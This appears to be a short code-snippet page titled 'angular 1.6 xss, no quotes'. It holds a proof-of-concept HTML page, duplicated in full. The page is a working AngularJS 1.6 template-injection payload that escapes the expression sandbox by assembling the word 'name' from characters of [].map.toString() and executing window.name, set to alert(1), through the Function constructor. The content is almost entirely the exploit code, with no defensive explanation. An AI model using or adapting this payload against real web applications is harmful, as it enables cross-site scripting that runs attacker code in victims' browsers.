koto/angular 1.6 xss, no quotes,

## angular 1.6 xss, no quotes,

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <title>JS Bin</title>
</head>
<body>

  <iframe name=alert(1) src="data:text/html,
<body ng-app>
<script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js></script>

                                   <div>{{1338-1}}</div>

  // Works in Chrome, correct offsets for FF
  <div>{{
  c=[].map.toString();this.constructor.constructor(c[23]+c[22]+c[19]+[].fill.name[3]+c[12]+c[7]+c[10]+c[9]+c[23]+c[13]
  )()
  }}</div>
  </body>
                           "></iframe>


</body>
</html>

	<!DOCTYPE html>
	<html>
	<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width">
	<title>JS Bin</title>
	</head>
	<body>

	<iframe name=alert(1) src="data:text/html,
	<body ng-app>
	<script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js></script>

	<div>{{1338-1}}</div>

	// Works in Chrome, correct offsets for FF
	<div>{{
	c=[].map.toString();this.constructor.constructor(c[23]+c[22]+c[19]+[].fill.name[3]+c[12]+c[7]+c[10]+c[9]+c[23]+c[13]
	)()
	}}</div>
	</body>
	"></iframe>


	</body>
	</html>